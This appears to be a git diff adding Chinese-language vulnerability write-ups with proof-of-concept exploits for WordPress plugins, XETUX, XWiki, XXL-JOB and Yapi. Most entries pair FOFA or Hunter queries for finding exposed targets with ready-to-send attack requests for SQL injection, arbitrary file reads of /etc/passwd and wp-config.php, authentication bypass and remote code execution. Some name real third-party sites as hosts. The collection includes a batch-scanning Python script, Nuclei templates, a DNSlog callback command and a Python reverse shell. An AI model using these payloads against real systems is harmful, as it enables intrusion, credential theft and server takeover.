+WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞，原因是用户提供的参数未进行充分的转义处理，而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询，从而从数据库中提取敏感信息。
+
+## fofa
+```javascript
+body="/wp-content/plugins/tutor/"
+```
+
+## poc
+```javascript
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: academy.keune.ch
+Content-Type: application/x-www-form-urlencoded
+
+action=load_filtered_instructor&_tutor_nonce=56803fc221&rating_filter=1e0+and+1=0+Union+select+1,2,3,4,5,6,7,8,9,concat(0x7e,user(),0x7e),11,12,14--+-
+```
+
+访问网站查看源码，获取_tutor_nonce的参数
+
+![image-20241227220244898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272202950.png)
+
+![image-20241227220301165](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272203238.png)
+
+## python脚本
+
+```python
+import requests
+import urllib3
+from urllib.parse import urljoin
+import argparse
+import ssl
+import re
+
+ssl._create_default_https_context = ssl._create_unverified_context
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def read_file(file_path):
+    with open(file_path, 'r') as file:
+        return file.read().splitlines()
+        
+def check_sql_injection(url):
+    target_url = url.rstrip("/")
+    target_url_tutor_nonce = urljoin(target_url, "")
+    print(target_url_tutor_nonce)
+    target_endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
+
+    headers = {
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15",  
+        "Content-Type": "application/x-www-form-urlencoded"
+    }
+
+    tutor_nonce = None
+
+    try:
+        response = requests.get(target_url_tutor_nonce, verify=False, headers=headers, timeout=15)
+        
+        match = re.search(r'"_tutor_nonce":"(\w+)"', response.text)
+        if match:
+            tutor_nonce = match.group(1)
+            print(f"\033[32mFound_tutor_nonce: {tutor_nonce}\033[0m")
+            
+        if tutor_nonce:
+            payloads = f"action=load_filtered_instructor&_tutor_nonce={tutor_nonce}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(123321),version()),11,12,14--+-"
+            
+            
+            response = requests.post(target_endpoint, verify=False, headers=headers, timeout=15, data=payloads)
+            if response.status_code == 200 and all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110']):
+                print(f"\033[31mFind: {url}: WordPress_CVE-2024-10400_sql_Injection!\033[0m")
+                return True
+
+    except requests.RequestException as e:
+        print(f"Error checking {url}: {e}")
+
+    return False
+
+def main():
+    parser = argparse.ArgumentParser(description="Check for SQL injection vulnerabilities.")
+    group = parser.add_mutually_exclusive_group(required=True)
+    group.add_argument("-u", "--url", help="Target URL")
+    group.add_argument("-f", "--file", help="File containing URLs")
+
+    args = parser.parse_args()
+
+    if args.url:
+        check_sql_injection(args.url)
+    elif args.file:
+        urls = read_file(args.file)
+        for url in urls:
+            check_sql_injection(url)
+
+if __name__ == "__main__":
+    main()
+```
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-PoC/blob/d6dc0f2baa9e65ae8d277f9e67086dc2f4bd72ac/WordPress_CVE-2024-10400_sql_Injection.py#L42
\ No newline at end of file
diff --git a/WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md b/WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md
new file mode 100644
index 0000000..34fc4bb
--- /dev/null
+++ b/WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md
@@ -0,0 +1,71 @@
+# WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849)
+
+WordPress 的 WP Guru 错误日志查看器插件在 1.0.1.3 及之前的所有版本中都容易受到通过 wp_ajax_nopriv_elvwp_log_download AJAX 操作进行任意文件读取的攻击。这使得未经身份验证的攻击者可以读取服务器上任意文件的内容，其中可能包含敏感信息。
+
+## poc
+
+```yaml
+id: CVE-2024-12849
+
+info:
+  name: Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read
+  author: s4e-io
+  severity: high
+  description: |
+    The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
+  reference:
+    - https://github.com/RandomRobbieBF/CVE-2024-12849
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-12849
+    - https://www.cve.org/CVERecord?id=CVE-2024-12849
+    - https://github.com/advisories/GHSA-899p-f2mf-g895
+    - https://www.tenable.com/cve/CVE-2024-12849
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-12849
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: wp-guru
+    product: error-log-viewer-wp
+    framework: wordpress
+    shodan-query: http.html:"wp-content/plugins/error-log-viewer-wp"
+    fofa-query: body="wp-content/plugins/error-log-viewer-wp"
+  tags: cve,cve2024,wordpress,wp-plugin,error-log-viewer-wp,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "/wp-content/plugins/error-log-viewer-wp")'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        
+        action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd
+    matchers:
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body)"
+          - 'contains(content_type, "application/octet-stream")'
+          - "status_code == 200"
+        condition: and
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/projectdiscovery/nuclei-templates/pull/11456/files
\ No newline at end of file
diff --git a/WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md b/WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md
new file mode 100644
index 0000000..9a93a3d
--- /dev/null
+++ b/WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md
@@ -0,0 +1,24 @@
+# WordPress插件Wux-Blog-Editor存在前台越权漏洞( CVE-2024-9932)
+
+**Wux-Blog-Editor 是在一个地方编辑来自所有不同WordPress网站的帖子和页面的插件，位于 /wp-content/plugins/wux-blog-editor/External_Post_Editor.php 中的 wuxbt_externalAutologin 方法存在前台越权漏洞，只需要传入Referer 为 https://blog.tool.wux.nl/ 即可直接登录管理员账号.**
+
+## poc
+```javascript
+GET /wp-json/external-post-editor/v2/autologin HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Referer: https://blog.tool.wux.nl/
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: su_webp=1
+Connection: close
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041355933.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/FxogQW3DX58JYtWxFfxSIQ
\ No newline at end of file
diff --git a/WordPress插件query-console存在未授权RCE漏洞.md b/WordPress插件query-console存在未授权RCE漏洞.md
new file mode 100644
index 0000000..2903067
--- /dev/null
+++ b/WordPress插件query-console存在未授权RCE漏洞.md
@@ -0,0 +1,19 @@
+# WordPress插件query-console存在未授权RCE漏洞
+
+WordPress Query Console插件1.0版本存在安全缺陷问题，未经身份验证的远程攻击者可利用此插件执行任意PHP代码，调用系统命令可直接造成RCE,植入webshell将进一步获取服务器权限
+
+## poc
+
+```javascript
+POST /wp-json/wqc/v1/query HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/json
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+
+{"queryArgs":"system('cat /etc/passwd')","queryType":"WP_Query"}
+```
+
diff --git a/WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md b/WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md
new file mode 100644
index 0000000..e23839a
--- /dev/null
+++ b/WordPress插件radio存在SSRF漏洞(CVE-2024-54385).md
@@ -0,0 +1,86 @@
+# WordPress插件radio存在SSRF漏洞(CVE-2024-54385)
+
+WordPress插件radio存在SSRF漏洞(CVE-2024-54385)
+
+## fofa
+
+```javascript
+body="wp-content/plugins/radio-player"
+```
+
+## poc
+
+```javascript
+id: CVE-2024-54385
+
+info:
+  name: Radio Player <= 2.0.82 - Server-Side Request Forgery
+  author: s4e-io
+  severity: high
+  description: |
+    The Radio Player Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
+  reference:
+    - https://patchstack.com/database/wordpress/plugin/radio-player/vulnerability/wordpress-radio-player-plugin-2-0-82-server-side-request-forgery-ssrf-vulnerability?_s_id=cve
+    - https://github.com/RandomRobbieBF/CVE-2024-54385
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/radio-player/radio-player-2082-unauthenticated-server-side-request-forgery
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2024-54385
+    cwe-id: CWE-918
+    epss-score: 0.00043
+    epss-percentile: 0.11007
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: softLab
+    product: radio-player
+    framework: wordpress
+    shodan-query: http.html:"wp-content/plugins/radio-player"
+    fofa-query: body="wp-content/plugins/radio-player"
+  tags: cve,cve2024,wordpress,wp-plugin,radio-player,ssrf
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "/wp-content/plugins/radio-player")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: nonce
+        group: 1
+        regex:
+          - '"nonce":"([a-z0-9]+)",\s*"isPro"'
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=radio_player_get_stream_data&nonce={{nonce}}&utm_source=&url=http://{{interactsh-url}}/live.m3u8
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "http")'
+          - 'contains(body, "success\":true")'
+          - 'contains(content_type, "application/json")'
+          - 'status_code == 200'
+        condition: and
+```
+
+## 漏洞来源
+
+- https://github.com/projectdiscovery/nuclei-templates/pull/11454/files
\ No newline at end of file
diff --git a/WordPress插件rtw_pdf_file任意文件读取漏洞.md b/WordPress插件rtw_pdf_file任意文件读取漏洞.md
new file mode 100644
index 0000000..4b03603
--- /dev/null
+++ b/WordPress插件rtw_pdf_file任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# WordPress插件rtw_pdf_file任意文件读取漏洞
+
+WordPress插件rtw_pdf_file任意文件读取漏洞，适用于 WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击，包括 1.7.5 rtw_pgaepb_dwnld_pdf（） 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容，其中可能包含敏感信息。
+
+## fofa
+```javascript
+"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder"
+```
+
+## poc
+```javascript
+GET /?rtw_pdf_file=../../../wp-config.php&rtw_generate_pdf=1 HTTP/1.1
+Host: korurealestate.co.uk
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241227211927240](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272119351.png)
\ No newline at end of file
diff --git a/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md b/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md
new file mode 100644
index 0000000..1298d0c
--- /dev/null
+++ b/WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483).md
@@ -0,0 +1,37 @@
+## WordPress的Meetup插件身份验证绕过漏洞(CVE-2024-50483)
+
+WordPress的Meetup插件在0.1及以下的所有版本中都容易绕过身份验证。这是由于插件在通过facebook_register（）函数对用户进行身份验证之前没有正确验证用户的身份。这使得未经身份验证的攻击者可以作为任何用户登录，只要他们知道自己的电子邮件地址。
+注意：您需要知道您要登录的用户电子邮件地址。
+
+poc
+---
+
+```javascript
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: kubernetes.docker.internal
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 149
+
+action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/
+```
+
+Response
+--
+
+```
+HTTP/1.1 200 OK
+Date: Tue, 05 Nov 2024 21:37:23 GMT
+Server: Apache/2.4.57 (Debian)
+X-Powered-By: PHP/8.2.13
+X-Robots-Tag: noindex
+X-Content-Type-Options: nosniff
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+Referrer-Policy: strict-origin-when-cross-origin
+X-Frame-Options: SAMEORIGIN
+Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly
+Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly
+Set-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly
+Content-Length: 0
+Content-Type: text/html; charset=UTF-8
+```
\ No newline at end of file
diff --git a/WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md b/WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md
new file mode 100644
index 0000000..eb82a1a
--- /dev/null
+++ b/WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522).md
@@ -0,0 +1,20 @@
+# WordPress系统插件LearnPress存在SQL注入漏洞(CVE-2024-8522)
+
+WordPress系统插件LearnPress存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## fofa
+
+```javascript
+body="/wp-content/plugins/learnpress"
+```
+
+## poc
+
+```javascript
+GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(8)),0) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+```
+
+![image-20240926094748650](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409260948413.png)
\ No newline at end of file
diff --git a/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md b/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md
new file mode 100644
index 0000000..c047c1e
--- /dev/null
+++ b/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md
@@ -0,0 +1,6 @@
+## Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553)
+ 在wordpress的Backup Migration 插件中存在代码注入漏洞，未授权的攻击者可以利用该漏洞注入恶意PHP代码并执行。 
+
+
+## poc
+- https://github.com/Chocapikk/CVE-2023-6553
diff --git a/XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md b/XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md
new file mode 100644
index 0000000..dda78e3
--- /dev/null
+++ b/XETUX软件dynamiccontent.properties.xhtml远程代码执行漏洞.md
@@ -0,0 +1,31 @@
+# XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行漏洞
+
+# 一、漏洞简介
+XETUX 是一个全面的解决方案，包括一套安全、强大和可监控的软件程序，专为自动控制餐厅和零售而设计和开发。XETUX 存在代码执行漏洞，攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。
+
+# 二、影响版本
++ XETUX
+
+# 三、资产测绘
++ hunter`web.title="@XETUX"&&web.title="XPOS"&&web.body="BackEnd"`
++ 特征
+
+![1699982974504-882e8d2a-1432-40ed-b58d-35804b7f5b30.png](./img/zGhN8NRZI5iD2KlU/1699982974504-882e8d2a-1432-40ed-b58d-35804b7f5b30-555753.png)
+
+# 四、漏洞复现
+```plain
+POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 1643
+
+pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSetNq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRYaMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=whoami
+```
+
+![1699983002251-c1a04632-044e-4c2b-addd-4b72512055d8.png](./img/zGhN8NRZI5iD2KlU/1699983002251-c1a04632-044e-4c2b-addd-4b72512055d8-006575.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pxfxhsioq9tk37xp>
\ No newline at end of file
diff --git a/XWikiDatabaseSearch存在远程命令执行漏洞（CVE-2024-31982）.md b/XWikiDatabaseSearch存在远程命令执行漏洞（CVE-2024-31982）.md
new file mode 100644
index 0000000..41a42f3
--- /dev/null
+++ b/XWikiDatabaseSearch存在远程命令执行漏洞（CVE-2024-31982）.md
@@ -0,0 +1,29 @@
+# XWiki DatabaseSearch存在远程命令执行漏洞（CVE-2024-31982）
+
+# 一、漏洞简介
+XWiki是一个由Java编写的基于LGPL协议发布的开源wiki和应用平台。它的开发平台特性允许创建协作式Web应用，同时也提供了构建于平台之上的打包应用（第二代wiki）。XWiki DatabaseSearch接口处存在RCE漏洞（CVE-2024-31982），恶意攻击者可能利用此漏洞执行恶意命令，获取服务器敏感信息，最终可能导致服务器失陷。
+
+# 二、影响版本
+XWiki
+
+# 三、资产测绘
+```plain
+body="data-xwiki-reference"
+```
+
+![1718991317308-42e2df7f-35ed-465e-84b6-3bb246ce0832.png](./img/bKcs4dowKNy8ybF3/1718991317308-42e2df7f-35ed-465e-84b6-3bb246ce0832-659769.png)
+
+# 四、漏洞复现
+```java
+GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+World!%22++%2B+%2850+%2B+49%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1718991292434-48a4a954-7965-4a83-ad76-c889f58e7327.png](./img/bKcs4dowKNy8ybF3/1718991292434-48a4a954-7965-4a83-ad76-c889f58e7327-084598.png)
+
+
+
+> 更新: 2024-06-23 23:42:48  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ft07tqn8syvqtesk>
\ No newline at end of file
diff --git a/XXL-JOB默认accessToken权限绕过漏洞.md b/XXL-JOB默认accessToken权限绕过漏洞.md
new file mode 100644
index 0000000..f2d3320
--- /dev/null
+++ b/XXL-JOB默认accessToken权限绕过漏洞.md
@@ -0,0 +1,32 @@
+# XXL-JOB默认accessToken权限绕过漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);"> XXL-JOB 默认配置下，用于调度通讯的 accessToken 不是随机生成的，而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值，攻击者可利用此绕过认证调用 executor，执行任意代码，从而获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ <font style="color:rgb(0, 0, 0);">XXL-JOB</font>
+
+# <font style="color:rgb(0, 0, 0);">三、资产测绘</font>
++ hunter`app.name="XXL-JOB"`
++ 特征![1699413014637-abd39b12-24f1-4f3e-a8be-1b5a12515d2c.png](./img/sKn1oToMtxlW5Er2/1699413014637-abd39b12-24f1-4f3e-a8be-1b5a12515d2c-008562.png)
+
+# 四、漏洞复现
+```plain
+POST /run HTTP/1.1
+Content-Type: application/json
+XXL-JOB-ACCESS-TOKEN: default_token
+User-Agent: Java/1.8.0_391
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 323
+Connection: close
+
+{"jobId": 287040,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "ping 0n3fio.dnslog.cn","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}
+```
+
+![1699413047757-a647af66-cd6a-4bb0-a48f-876fe2f1c266.png](./img/sKn1oToMtxlW5Er2/1699413047757-a647af66-cd6a-4bb0-a48f-876fe2f1c266-630756.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ixd973mksvmz9c3w>
\ No newline at end of file
diff --git a/Yapi存在远程命令执行漏洞.md b/Yapi存在远程命令执行漏洞.md
new file mode 100644
index 0000000..d22903a
--- /dev/null
+++ b/Yapi存在远程命令执行漏洞.md
@@ -0,0 +1,61 @@
+# Yapi存在远程命令执行漏洞
+
+# 一、漏洞简介
+Yapi存在远程命令执行漏洞
+
+# 二、影响版本
++ Yapi
+
+# 三、资产测绘
++ fofa：`app="YApi"`
++ 特征
+
+![1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d.png](./img/R4R5xyBZVQ_9RrKW/1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d-882788.png)
+
+# 四、漏洞复现
+注册账号登录
+
+![1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06.png](./img/R4R5xyBZVQ_9RrKW/1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06-740149.png)
+
+新建项目
+
+![1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2.png](./img/R4R5xyBZVQ_9RrKW/1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2-659707.png)
+
+添加接口
+
+![1733889123950-560b7590-201a-477d-98e0-aba7da89b62a.png](./img/R4R5xyBZVQ_9RrKW/1733889123950-560b7590-201a-477d-98e0-aba7da89b62a-577318.png)
+
+```java
+const sandbox = this
+const ObjectConstructor = this.constructor
+const FunctionConstructor = ObjectConstructor.constructor
+const myfun = FunctionConstructor('return process')
+const process = myfun()
+mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
+```
+
+![1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622.png](./img/R4R5xyBZVQ_9RrKW/1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622-586119.png)
+
+![1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52.png](./img/R4R5xyBZVQ_9RrKW/1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52-059135.png)
+
+![1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7.png](./img/R4R5xyBZVQ_9RrKW/1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7-172808.png)
+
+反弹shell
+
+```java
+const sandbox = this
+const ObjectConstructor = this.constructor
+const FunctionConstructor = ObjectConstructor.constructor
+const myfun = FunctionConstructor('return process')
+const process = myfun()
+Poc = process.mainModule.require("child_process").spawnSync(
+  'python', ['-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
+)
+```
+
+![1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8.png](./img/R4R5xyBZVQ_9RrKW/1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8-057460.png)
+
+
+
+> 更新: 2024-12-20 14:53:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zwurnkdpoozs08fc>
\ No newline at end of file
diff --git a/Yearningfront接口存在任意文件读取漏洞.md b/Yearningfront接口存在任意文件读取漏洞.md
new file mode 100644
